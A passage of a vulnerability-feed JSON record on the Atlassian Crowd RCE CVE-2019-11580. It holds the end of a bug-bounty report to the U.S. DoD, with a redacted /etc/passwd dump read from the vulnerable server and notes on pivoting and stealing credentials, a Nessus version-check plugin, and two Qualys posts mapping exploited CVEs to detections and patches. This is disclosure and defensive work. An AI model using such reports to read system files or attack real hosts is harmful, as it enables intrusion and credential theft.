user\":/var/empty/\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:47:47::/var/spool/mqueue:/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:51:51::/var/spool/mqueue:/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:74:74:Privilege-separated SSH:/var/empty/\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:81:81:System message bus:/:/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:500:500:EC2 Default User:/home/\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/bin/bash\n```\n\n## Product, Version, and Configuration (If applicable)\n```\nCrowd or Crowd Data Center from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x)\nCrowd or Crowd Data Center from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x)\nCrowd or Crowd Data Center from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x)\nCrowd or Crowd Data Center from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x)\nCrowd or Crowd Data Center from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x)\n```\n\n## Suggested Mitigation/Remediation Actions\nI recommend updating to the latest version of Atlassian Crowd, but if that's not possible, follow mitigation options in the advisory.\n\n## Impact\n\nRemote code execution on https://\u2588\u2588\u2588. An attacker could exploit this vulnerability to pivot into NIPRNet and gain access to other applications. Since Atlassian Crowd is an Identity management / Single Sign-on application, an attacker could exploit this vulnerability to gain access to any applications using Crowd for sign-ons. \n\n\nSince this is running as root, an attacker could also easily backdoor the login page and steal credentials.\n\nThanks,\nCorben Leo (@cdl)", "modified": "2019-10-04T15:14:59", "published": "2019-06-30T03:11:39", "id": "H1:632721", "href": "https://hackerone.com/reports/632721", "type": "hackerone", "title": "U.S. Dept Of Defense: Root Remote Code Execution on https://\u2588\u2588\u2588", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-10-31T05:28:00", "description": "The version of Atlassian Crowd installed on the remote host is 2.1.x prior\nto 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 \nor 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution\n(RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by\nusing pdkinstall development plugin, to install arbitrary plugins, which permits\nremote code execution.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 15, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-28T00:00:00", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-11580"], "modified": "2019-05-28T00:00:00", "cpe": ["cpe:/a:atlassian:crowd"], "id": "CROWD_3_4_4.NASL", "href": "https://www.tenable.com/plugins/nessus/125477", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125477);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/30\");\n\n script_cve_id(\"CVE-2019-11580\");\n script_xref(name:\"IAVA\", value:\"2020-A-0499\");\n\n script_name(english:\"Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE Vulnerability\");\n script_summary(english:\"Checks the version of Crowd\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected\nby an remote code execution (RCE) vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Crowd installed on the remote host is 2.1.x prior\nto 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 \nor 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution\n(RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by\nusing pdkinstall development plugin, to install arbitrary plugins, which permits\nremote code execution.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f66fbb1c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 3.0.5, 3.1.6, 3.2.8, 3.3.5, 3.4.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11580\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:crowd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"crowd_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/crowd\");\n script_require_ports(\"Services/www\", 8095);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\nport = get_http_port(default:8095);\n\napp = \"crowd\";\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.1.0\", \"fixed_version\" : \"3.0.5\" },\n { \"min_version\" : \"3.1.0\", \"fixed_version\" : \"3.1.6\" },\n { \"min_version\" : \"3.2.0\", \"fixed_version\" : \"3.2.8\" },\n { \"min_version\" : \"3.3.0\", \"fixed_version\" : \"3.3.5\" },\n { \"min_version\" : \"3.4.0\", \"fixed_version\" : \"3.4.4\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2021-01-06T00:22:53", "bulletinFamily": "blog", "cvelist": ["CVE-2014-1812", "CVE-2016-0167", "CVE-2017-11774", "CVE-2018-13379", "CVE-2018-15961", "CVE-2018-8581", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-19781", "CVE-2019-3398", "CVE-2019-8394", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1472"], "description": "**Update Jan 5, 2021**: New patching section with two new dashboard widgets showing the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\n**Update Dec 23, 2020**: Added a new section on compensating controls.\n\n**Update Dec 22, 2020: **FireEye disclosed the theft of their Red Team assessment tools. Hackers now have an influential collection of new techniques to draw upon.\n\nUsing Qualys VMDR, the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following Real-Time Threat Indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n![](https://blog.qualys.com/wp-content/uploads/2020/12/Solori3-1-1070x417.png)\n\n**Original post**: On December 8, 2020, [FireEye disclosed](<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>) theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the security posture of their customers. According to FireEye, the hackers now have an influential collection of new techniques to draw upon. It is unclear today if the attackers intend to use the tools themselves or if they intend to release the tools publicly in some way. \n\n\u201cThe attackers tailored their world-class capabilities specifically to target and attack FireEye. They are highly trained in operational security and executed with discipline and focus. They operated clandestinely, using methods that counter security tools and forensic examination,\u201d said Kevin Mandia, CEO of FireEye. However, the stolen tools did not contain zero-day exploits. \n\nIn response to the breach, FireEye has provided Red Team tool countermeasures which are [available on GitHub](<https://github.com/fireeye/red_team_tool_countermeasures>). These countermeasures include rules in multiple languages such as Snort, Yara, ClamAV and HXIOC. Since none of the leaked tools leverage zero-day attacks, FireEye also provided a [listing of CVEs](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) used by these tools. \n\nAn analysis of these tools shows that the functionality and capabilities may mimic some existing red team tools such as Metasploit or Cobalt Strike. Similar to how the Shadow Brokers leak led to outbreaks such as WannaCry, it is possible that this breach could lead to other commodity malware leveraging these capabilities. Any time there is high-fidelity threat intelligence such as the countermeasures provided by FireEye, it is important to look at it under the lens of how you can protect your organization going forward, as well as how you can validate if this has been used in your organization previously. \n\n### Mitigation & Protection \n\n[Snort](<https://www.snort.org/>) is an open-source intrusion prevention system (IPS) which uses an open format for its rule structure. While many companies use the open-source version of Snort, commercial IPS tools are also able to leverage the Snort rule format. Most of these rules are tuned to specifically look for beacon traffic or components of remote access tools. If your organization is using an IPS or IDS, you should plug in these signatures to look for evidence of future exploitation.\n\n[ClamAV](<https://www.clamav.net/>) is an open-source antivirus engine which is now owned by Cisco. To prevent these tools from executing on the endpoint, the provided signatures can be imported into this AV engine or any other antivirus which uses the ClamAV engine.\n\n[Yara](<https://github.com/VirusTotal/yara>) was designed by VirusTotal to help malware researchers both identify and classify malware samples. Yara can be used as a standalone scanning engine or built in to many endpoint security products as well. The provided rules can be imported into many endpoint security tools to match and block future execution of known malware.\n\nAnother important aspect for preventing the usage of these red teaming tools in your environment is to address the vulnerabilities they are known to exploit. There are 16 vulnerabilities which have been prioritized based on the CVSS score associated with them. Using a vulnerability management product such as [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can proactively search which endpoints or devices have these vulnerabilities and deploy patches or configuration fixes to resolve them before an adversary has a chance to exploit them. \n\n### Threat Hunting \n\nHunting for evidence of a breach is just as important as trying to prevent the breach. Two of the components FireEye released to help this search are HXIOC and Yara rules. These help define what triggers to look for to make the determination if the organization has been breached by these tools. \n\nThe HXIOC rules provided are based on the [OpenIOC](<https://github.com/mandiant/OpenIOC_1.1>) format originally created by Mandiant. These are similar to the STIX and CyBOX formats maintained by [OASIS](<https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=cti>). The rules provided by FireEye call out many process names and associated command line arguments which can be used to hunt for the evidence of an attack. \n\nBy using the provided Yara rule which encompasses all of the Yara countermeasures, you can scan multiple directories using the standalone Yara engine by issuing the \u201cyara -r all-rules.yara <path>\u201d, where <path> is the location you want to recursively scan. \n\nAlternatively, VirusTotal also has a useful API called [RetroHunt](<https://support.virustotal.com/hc/en-us/articles/360001293377-Retrohunt>) which allows you to scan files submitted within the last 12 months. [Florian Roth](<https://twitter.com/cyb3rops/status/1336583694912516096>) has gone through and submitted all of the provided Yara rules to RetroHunt and created a [Google Sheets document](<https://docs.google.com/spreadsheets/d/1uRAT-khTdp7fp15XwkiDXo8bD0FzbdkevJ2CeyXeORs/edit>) containing all of the detections. In this document you can see valuable information such as the number of detections and file hashes for each of the detected samples. \n\n### Detect 16 Publicly Known Vulnerabilities using Qualys VMDR \n\nHere is a prioritized list of CVEs published on [Github](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) by FireEye:\n\n**CVE** **ID**| **Name**| **CVSS**| **Qualys** **QID(s)** \n---|---|---|--- \nCVE-2019-11510| Pre-auth arbitrary file reading from Pulse Secure SSL VPNs| 10| 38771 \nCVE-2020-1472| Microsoft Active Directory escalation of privileges| 10| 91668 \nCVE-2018-13379| pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN| 9.8| 43702 \nCVE-2018-15961| RCE via Adobe ColdFusion (arbitrary file upload that can be used to upload a JSP web shell)| 9.8| 371186 \nCVE-2019-0604| RCE for Microsoft Sharepoint| 9.8| 110330 \nCVE-2019-0708| RCE of Windows Remote Desktop Services (RDS)| 9.8| 91541, 91534 \nCVE-2019-11580| Atlassian Crowd Remote Code Execution| 9.8| 13525 \nCVE-2019-19781| RCE of Citrix Application Delivery Controller and Citrix Gateway| 9.8| 150273, 372305 \nCVE-2020-10189| RCE for ZoHo ManageEngine Desktop Central| 9.8| 372442 \nCVE-2014-1812| Windows Local Privilege Escalation| 9| 91148, 90951 \nCVE-2019-3398| Confluence Authenticated Remote Code Execution| 8.8| 13475 \nCVE-2020-0688| Remote Command Execution in Microsoft Exchange| 8.8| 50098 \nCVE-2016-0167| local privilege escalation on older versions of Microsoft Windows| 7.8| 91204 \nCVE-2017-11774| RCE in Microsoft Outlook via crafted document execution (phishing)| 7.8| 110306 \nCVE-2018-8581| Microsoft Exchange Server escalation of privileges| 7.4| 53018 \nCVE-2019-8394| Arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus| 6.5| 374547 \n \nQualys released several remote and authenticated QIDs for CVEs published by FireEye. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.qid: [38771, 91668, 43702, 371186, 110330, 91541, 91534, 13525, 150273, 372305, 372442, 91148, 90951, 13475, 50098, 91204, 110306, 53018, 374547]_\n\n![](https://blog.qualys.com/wp-content/uploads/2020/12/Screen-Shot-2020-12-11-at-2.33.14-PM-1070x524.png)\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities. \n\n![](https://blog.qualys.com/wp-content/uploads/2020/12/fireeye-feed2-1070x667.png)\n\nWith VMDR Dashboard, you can track these 16 publicly known vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [FireEye Theft Top 16 CVEs & IOC Hashes](<https://qualys-secure.force.com/customer/s/article/000006470>) dashboard. \n\n![](https://blog.qualys.com/wp-content/uploads/2020/12/TOP-2-1-1070x1747.png) \n\n### **Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools** \n\nTo reduce the overall security risk, it is important to address misconfigurations associated with the CVEs in addition to general security hygiene and system hardening. \n\nQualys customers can leverage the newly released policy \u201c_Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools_.\u201d This policy contains controls which can be used as workarounds / mitigations for these vulnerabilities if patching cannot be done immediately. \n\n**Control List: ** \n\nCVE IDs| Control ID | Statement \n---|---|--- \nCVE-2020-1472| 20002| Status of the 'Domain controller: Allow vulnerable Netlogon secure channel connections' Group policy setting \nCVE-2018-13379 | 20010 | Status of the source interface setting for SSL-VPN \nCVE-2019-19781| 13952 | Status of 'Responder' feature configured on the appliance \nCVE-2019-19781 | 20011 | Status of the responder action configured on the device \nCVE-2019-19781 | 20008 | Status of the responder policies configured on the device \nCVE-2019-19781 | 20009 | Status of the responder global binds configured on the device \nCVE-2016-0167 | 19440 | Status of Trust Center "Block macros from running in Office files from the Internet" setting for a user profile \nCVE-2018-8581 | 20007 | Status of the 'DisableLoopbackCheck' setting \nCVE-2019-0708 | 10404 | Status of the 'Require user authentication for remote connections by using Network Level Authentication' setting \nCVE-2019-0708 | 7519 | Status of the 'Allow users to connect remotely using Remote Desktop Services (Terminal Services)' setting \nCVE-2019-0708 | 1430 | Status of the 'Terminal Services' service \nCVE-2019-0708 | 3932 | Status of the 'Windows Firewall: Inbound connections (Public)' setting \nCVE-2019-0708 | 3948 | Status of the 'Windows Firewall: Inbound connections (Private)' setting \nCVE-2019-0708 | 3949 | Status of the 'Windows Firewall: Inbound connections (Domain)' setting \nCVE-2019-0708 | 3950 | Status of the 'Windows Firewall: Firewall state (Public)' setting \nCVE-2019-0708 | 3951 | Status of the 'Windows Firewall: Firewall state (Private)' setting \nCVE-2019-0708 | 3952 | Status of the 'Windows Firewall: Firewall state (Domain)' setting \nCVE-2019-0708 | 11220 | List of 'Inbound Rules' configured in Windows Firewall with Advanced Security via GPO \nCVE-2017-11774 | 13843 | Status of the 'Do not allow folders in non-default stores to be set as folder home pages' setting \nCVE-2017-11774 | 20003 | Status of the 'EnableRoamingFolderHomepages' registry setting \nCVE-2017-11774 | 20004 | Status of the 'Do not allow Home Page URL to be set in folder Properties' Group policy setting \n \nWith Qualys Configuration Management, you can easily identify misconfigured systems in context of these vulnerabilities. The screenshot below shows the total passing and failing controls for the impacted assets in the report.\n\n![](https://blog.qualys.com/wp-content/uploads/2020/12/image-18.png)\n\nView control posture details with remediation steps. The screenshot below shows control pass/fail details along with actual evidence from impacted asset. \n\n![](https://blog.qualys.com/wp-content/uploads/2020/12/image-19.png)\n\n### FireEye Disclosure of the Theft of their Red Team Assessment Tools \n\nHackers now have an influential collection of new techniques to draw upon. Qualys released a new RTI for Solorigate/SUNBURST vulnerabilities so customers can effectively prioritize these CVEs in their environment.\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following real-time threat indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n![](https://blog.qualys.com/wp-content/uploads/2020/12/Solori3-1-1070x417.png)\n\n### Remediate FireEye-Related Vulnerabilities with Qualys Patch Management\n\n#### Identify and Install Needed Patches\n\nTo view the relevant missing patches in your environment that are required to remediate the vulnerabilities leveraged by the FireEye tools you may run the following QQL in the Patches tab of [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>):\n \n \n (qid: [91541,372442,38771,91534,91204,110330,371186,91148,90951,43702,374547,372305,110306,50098,91668,13475,53018,13525,150273])\n\n![](https://blog.qualys.com/wp-content/uploads/2021/01/fireeyepatches-1070x528.png)\n\nIt is highly recommended to select all the patches returned by this QQL and add them to a new on-demand patch job. You can then target as many assets as possible and deploy the patch job as soon as possible. Note that the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) will only deploy the right patch to the right asset, meaning the Qualys patch job will do the mapping of patch to asset (so you don\u2019t have to) ensuring only the right patch is deployed to the right asset (in terms of binary architecture, OS version, etc). In addition, if a patch is not needed by a specific asset the Qualys agent will \u201cskip\u201d this asset and the patch will not be deployed.\n\nThe same QQL can be used in the patch assets tab in order to see all the assets that miss at least one of the FireEye-related patches:\n\n![](https://blog.qualys.com/wp-content/uploads/2020/12/assetsfireeye-1070x532.png)\n\n#### Visualize Assets Requiring Patches\n\nQualys has created two dashboard widgets that you can import into the patch management dashboard. These widgets will show the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\nSteps to Import the Widget:\n\n * Click on "Setting" icon in "Dashboard" section.\n * Select "Import New Widget" option.\n * Enter a name of your choice for the widget.\n * Browse the JSON file to import.\n * Click on "Import" button.\n * On success, you should see the new widget in your Dashboard.\n\nYou can download these two dashboard widgets from the PatchMGMT-Fireeye-Widgets attachment at the bottom of the [FireEye Theft dashboards](<https://qualys-secure.force.com/customer/s/article/000006470>) article. \n\n### Hunting in Endpoint Detection and Response (EDR) \n\nThere are two components to hunt for evidence of these tools using the [Qualys EDR](<https://www.qualys.com/apps/endpoint-detection-response/>). The first is looking for evidence of the files from the provided Yara signatures. Qualys has taken the file hashes from the RetroHunt tool and created a dashboard. With a single click you can find evidence of any matches in your environment. \n\nThe second component is hunting for evidence of the processes outlined in the OpenIOC signatures. While these signatures cannot be imported directly into Qualys EDR, the Qualys Labs team is converting these into Qualys Query Language (QQL) which can be used in the Qualys EDR hunting page. An example provided here shows hunting for [this Seatbelt signature](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/rules/BELTALOWDA/supplemental/hxioc/SEATBELT%20\$UTILITY\$.ioc>). In the coming days, these hunting queries will be available to all Qualys EDR customers. \n\n![](https://blog.qualys.com/wp-content/uploads/2020/12/image-2.png)\n\n![](https://blog.qualys.com/wp-content/uploads/2020/12/image-4.png)\n\n### Get Started Now \n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect and patch the high-priority publicly known vulnerabilities. \n\nStart your [Qualys EDR trial](<https://www.qualys.com/apps/endpoint-detection-response/>) to protect the entire attack chain, from attack and breach prevention to detection and response using the power of the Qualys Cloud Platform \u2013 all in a single, cloud-based app. \n\nStart your [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) trial to access the Live Threat Intelligence Feed that displays the latest vulnerability disclosures and maps them to your impacted IT assets. You can see the number of assets affected by each threat, and drill down into asset details. \n\n### References \n\n<https://github.com/fireeye/red_team_tool_countermeasures>\n\n<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>\n\n<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>\n\n<https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html>", "modified": "2020-12-10T00:48:29", "published": "2020-12-10T00:48:29", "id": "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-23T16:02:16", "bulletinFamily": "blog", "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.\n\n"Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and \nmitigation efforts," said the NSA advisory. It also recommended "critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage."\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) notifying about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information. \n\nHere is a list of 25 publicly known vulnerabilities (CVEs) published by the NSA, along affected products and associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller \nCitrix Gateway \nCitrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193 \nCVE-2020-8195 \nCVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 \nCitrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core & Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Multiple Microsoft Exchange Server| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 \nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\n * ![](https://blog.qualys.com/wp-content/uploads/2020/10/Screen-Shot-2020-10-22-at-10.32.04-AM-1-1070x479.png)\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for "Active Attack" RTI:\n\n![](https://blog.qualys.com/wp-content/uploads/2020/10/Screen-Shot-2020-10-22-at-10.43.47-AM-1-1070x535.png)\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2020/10/Screen-Shot-2020-10-22-at-1.41.35-PM-1070x828.png)\n\nWith VMDR Dashboard, you can track 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the ["NSA's Top 25 Vulnerabilities from China" dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n![](https://blog.qualys.com/wp-content/uploads/2020/10/2020-10-22_12-45-21-1070x2407.png)\n\n### **Recommendations**\n\nAs guided by CISA, to protect assets from exploiting, one must do the following:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Vigilance team of an organization should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority commonly exploited vulnerabilities.\n\n### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "modified": "2020-10-22T23:10:29", "published": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": 